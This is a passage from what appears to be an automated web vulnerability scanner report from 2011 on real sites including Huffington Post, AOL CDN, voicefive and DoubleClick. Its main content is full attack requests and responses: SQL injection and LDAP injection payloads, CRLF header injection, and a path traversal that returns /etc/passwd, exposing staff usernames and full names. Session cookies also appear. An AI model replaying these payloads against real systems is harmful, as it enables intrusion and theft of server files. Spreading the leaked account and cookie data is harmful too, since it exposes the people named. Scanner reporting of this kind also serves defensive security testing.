The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. File path traversal
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



2.1. http://o.aolcdn.com/art/merge [f parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge?f=/_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd&f=/_media/ch_music2/radio-legacy-muscnwssponslnk2.css&f=/_media/ch_music2/radio-legacy-promobar.css&f=/_media/ch_music2/radio-legacy-feeds_subscribe_en_us.css&f=/_media/music_en_us_css/aol.music.header.css&f=/_media/music_en_us_css/aol.music.footer.css&expsec=31536000&ver=40 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/css; charset=iso8859-1
Vary: Accept-Encoding
Cache-Control: max-age=31536000
Expires: Fri, 04 May 2012 13:03:58 GMT
Date: Thu, 05 May 2011 13:03:58 GMT
Connection: close
Content-Length: 26142

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin
...[SNIP]...
domo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/bin/false
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/bin/false
gkrellmd:x:101:101:gkrellmd user:/:/bin/false
nobody:x:99:99:Nobody:/:/bin/false
altadmin:x:5996:1026:Local Technogy:/home/altadmin:/bin/ksh
ashishbh:x:9480:1026:Ashish Bhatt:/home/ashishbh:/bin/ksh
astevens:x:6694:1026:Andrew Stevens:/home/astevens:/bin
...[SNIP]...

2.2. http://o.aolcdn.com/art/merge/ [f parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /mobileportal/s2c_modal.js../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js../../../../../../../../etc/passwd&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 01:12:53 GMT
Date: Thu, 05 May 2011 01:12:53 GMT
Connection: close
Content-Length: 20992

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL da
...[SNIP]...

3. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1fe895629ae7659c)(sn=* and 1fe895629ae7659c)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /bmx3/broker.pli?pid=1fe895629ae7659c)(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1fe895629ae7659c)!(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;!&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. HTTP header injection
There are 79 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dbbe6%0d%0aaea1137f35f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifdbbe6%0d%0aaea1137f35f?557101547 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
